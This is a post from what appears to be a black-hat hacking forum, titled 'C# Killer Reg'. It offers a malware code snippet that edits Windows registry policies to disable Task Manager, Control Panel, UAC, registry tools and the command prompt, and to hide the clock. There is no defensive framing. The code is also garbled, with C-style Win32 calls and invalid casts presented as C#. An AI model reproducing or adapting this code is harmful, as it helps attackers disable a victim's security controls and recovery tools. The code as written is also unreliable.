C# Killer Reg

  • 0 Replies
  • 96 Views

0 Members and 1 Guest are viewing this topic.

Offline Omega

    *
  • The Boss (Admin)
  • Black Hat Sec Member
  • Telegram: @BLACKHATSEC_FORUM
  • Posts: 190
  • Popularity: +1/-0
  • God of Malware
    • View Profile
    • Awards
« on: March 14, 2022, 09:34:38 AM »
Killer Reg

Code
// Disable TaskManager

   RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE, hKey);
   RegSetValueEx(hKey, "DisableTaskMgr", 0, REG_SZ, (byte)"1", "1".Length * sizeof(char));
   RegCloseKey(hKey);

   // Disable Control Panel

   RegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, KEY_SET_VALUE, hKey);
   RegSetValueEx(hKey, "NoControlPanel", 0, REG_SZ, (byte)"1", "1".Length * sizeof(char));
   RegCloseKey(hKey);

   // Hide Clock

   RegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, KEY_SET_VALUE, hKey);
   RegSetValueEx(hKey, "HideClock", 0, REG_SZ, (byte)"1", "1".Length * sizeof(char));
   RegCloseKey(hKey);

   // Disable UAC

   RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE, hKey);
   RegSetValueEx(hKey, "EnableLUA", 0, REG_SZ, (byte)"0", "0".Length * sizeof(char));
   RegCloseKey(hKey);

   // Disable Registry

   RegCreateKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, null, REG_OPTION_NON_VOLATILE, KEY_READ | KEY_SET_VALUE, null, hKey, 0);
   RegCloseKey(hKey);

   RegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE, hKey);
   RegSetValueEx(hKey, "DisableRegistryTools", 0, REG_DWORD, (byte) & value, sizeof(value));
   RegCloseKey(hKey);

   // Disable CMD

   RegCreateKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\Policies\\Microsoft\\Windows\\System", 0, null, REG_OPTION_NON_VOLATILE, KEY_READ | KEY_SET_VALUE, null, hKey, 0);
   RegCloseKey(hKey);

   RegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\Policies\\Microsoft\\Windows\\System", 0, KEY_SET_VALUE, hKey);
   RegSetValueEx(hKey, "DisableCMD", 0, REG_DWORD, (byte) & value, sizeof(value));
   RegCloseKey(hKey);

  • Discord: BLACK HAT SEC#5222
  • [+]
  • [-]

  •